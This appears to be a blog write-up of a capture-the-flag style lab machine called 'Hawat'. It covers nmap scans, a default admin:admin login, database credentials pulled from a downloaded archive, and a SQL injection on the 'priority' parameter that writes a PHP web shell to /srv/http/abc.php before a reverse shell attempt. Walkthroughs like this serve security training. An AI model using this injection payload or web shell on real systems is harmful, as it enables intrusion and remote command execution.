Hawat
00 min
2025-3-16
Date
Mar 16, 2025 → Mar 16, 2025
Tag
Nmap
Web Application Security
SQL Injection Techniques

192.168.197.147

Nmap

└─# nmap -Pn -n $ip -sU --top-ports=100 --reason Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-16 02:09 EDT Nmap scan report for 192.168.197.147 Host is up, received user-set. All 100 scanned ports on 192.168.197.147 are in ignored states. Not shown: 100 open|filtered udp ports (no-response)
Nmap done: 1 IP address (1 host up) scanned in 21.23 seconds
└─# nmap -sT -p- --min-rate 5000 $ip
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-16 02:08 EDT Warning: 192.168.197.147 giving up on port because retransmission cap hit (10). Nmap scan report for 192.168.197.147 Host is up (0.050s latency). Not shown: 65475 filtered tcp ports (no-response), 56 closed tcp ports (conn-refused) PORT STATE SERVICE 22/tcp open ssh 17445/tcp open unknown 30455/tcp open unknown 50080/tcp open unknown
 

22

brute force
No

17445/30445/50080

notion image
notion image
notion image
We can know this is nginx and apache from nmap
notion image
try search sploit
notion image
lot of script we can used
notion image

Dirb

nothing found

Feroxbuster

50080

notion image

17445

notion image

30445

notion image
we can found a new page for 50080
notion image
we try use admin:admin, and login successfully
notion image
we download the zip file and see anything we can found
notion image
we can find the mysql data base from this file.
User: issue_user
Password: ManagementInsideOld797
Additionally, we discovered that the priority parameter is vulnerable.
notion image
notion image
is it get, so we cant access, we try use burpsuite to do it
High' union select '<?php echo system($_REQUEST["cmd"]);?>' into outfile '/srv/http/abc.php' —
notion image
Use it and try run our command
notion image
try use reverse shell
notion image
 
上一篇
HB
下一篇
AZ-900